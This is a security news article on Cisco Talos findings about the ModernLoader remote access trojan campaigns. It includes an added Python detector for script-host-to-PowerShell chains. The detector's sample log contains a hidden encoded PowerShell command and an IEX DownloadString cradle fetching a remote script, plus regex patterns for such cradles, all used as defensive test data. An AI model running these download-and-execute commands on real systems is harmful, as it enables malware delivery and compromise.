ModernLoader is a new remote access trojan detected by Cisco Talos researchers.
ModernLoader Campaigns in the Wild
More specifically, the researchers analyzed three separate but related campaigns between March and June 2022 that delivered ModernLoader, RedLine and several cryptocurrency miners.
In these attacks, the threat actors chain PowerShell, .NET, HTA (HTML Application) and VBS files, eventually deploying malware such as SystemBC and DCRAT. The final payload of the campaigns is the ModernLoader remote access trojan, which harvests system information and deploys additional modules.
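As an added example (not Cisco Talos code and not derived from ModernLoader samples), the following Python scans constructed Sysmon-style process-creation records for the generic delivery pattern the article describes: an HTA or VBS launcher (mshta.exe, wscript.exe, cscript.exe) spawning PowerShell, with extra weight given to encoded commands, download cradles and hidden windows. The log format, the sample lines and the argument heuristics are assumptions made for illustration, not indicators from the Talos report.

```python
"""Toy detector for a script-host -> PowerShell delivery chain.

Added example, not Cisco Talos code and not based on ModernLoader samples.
The record format 'pid=..|parent=..|image=..|cmd=..' and the sample lines
below are constructed for illustration; the argument heuristics are generic
PowerShell-abuse features, not indicators from the report.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Parent processes that execute HTA and VBS files.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line features that raise severity (assumed heuristics).
SUSPICIOUS_ARGS = [
    (re.compile(r"(?i)-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"), "encoded-command"),
    (re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|iwr\b|iex\b|invoke-expression"),
     "download-cradle"),
    (re.compile(r"(?i)-w(indowstyle)?\s+hidden"), "hidden-window"),
    (re.compile(r"(?i)-nop\b|-noprofile"), "no-profile"),
]

# Constructed sample records; 4120 and 4140 should fire, the others should not.
SAMPLE_LOG = """\
pid=4120|parent=C:\\Windows\\System32\\mshta.exe|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|cmd=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAA=
pid=4133|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|cmd=powershell.exe Get-Process
pid=4140|parent=C:\\Windows\\System32\\wscript.exe|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|cmd=powershell.exe -Command "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
pid=4151|parent=C:\\Windows\\System32\\cscript.exe|image=C:\\Windows\\System32\\cmd.exe|cmd=cmd.exe /c echo hi
"""


@dataclass
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> ProcEvent:
    """Parse one constructed 'key=value|...' record; cmd may itself contain '|' or '='."""
    fields = dict(part.split("=", 1) for part in line.split("|", 3))
    return ProcEvent(int(fields["pid"]), fields["parent"], fields["image"], fields["cmd"])


def analyze(event: ProcEvent) -> Optional[Dict]:
    """Return a finding when a script host spawns PowerShell, else None."""
    if basename(event.parent_image) not in SCRIPT_HOSTS:
        return None
    if basename(event.image) not in POWERSHELL:
        return None
    tags = [tag for rx, tag in SUSPICIOUS_ARGS if rx.search(event.command_line)]
    return {
        "pid": event.pid,
        "parent": basename(event.parent_image),
        "tags": tags,
        # The chain alone is worth a look; abuse-style arguments make it high.
        "severity": "high" if tags else "medium",
    }


def scan(log: str) -> List[Dict]:
    """Run analyze() over every non-empty record in a log blob."""
    findings = []
    for line in log.splitlines():
        if not line.strip():
            continue
        finding = analyze(parse_line(line))
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

The detector keys on the parent/child relationship rather than on file hashes or URLs, so it survives the module swapping the article mentions; the argument heuristics only adjust severity, because a legitimate admin script launched via wscript.exe would otherwise produce the same chain.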
“In the earlier campaigns from March, we also observed the attackers delivering the cryptocurrency mining malware XMRig. The March campaigns appeared to be targeting Eastern European users, as the constructor utility we analyzed had predefined script templates written in Bulgarian, Polish, Hungarian and Russian,” Cisco Talos explained.
ModernLoader provides remote access to targeted computers, enabling further malicious operations such as dropping more malware, stealing information, and adding the target to a botnet. The campaigns rely on various off-the-shelf tools, which complicates attribution; Cisco Talos attributes them to a previously unknown threat actor, possibly of Russian origin, targeting Eastern Europe (Bulgaria, Poland, Hungary, and Russia).
This unknown threat actor compromises vulnerable WordPress and cPanel instances to deliver the ModernLoader malware under the guise of fake Amazon gift cards. ModernLoader itself is a simple .NET remote access trojan that can collect system information, execute arbitrary commands, and download and run a file from the command-and-control server. The download-and-execute capability lets the threat actor swap modules in real time.
It is also noteworthy that the threat actor “has an interest in alternative distribution channels such as compromised web applications, archive infections and spreading by using Discord webhooks.” Despite the variety of delivery channels and techniques, Cisco Talos assesses that the analyzed campaigns had limited success.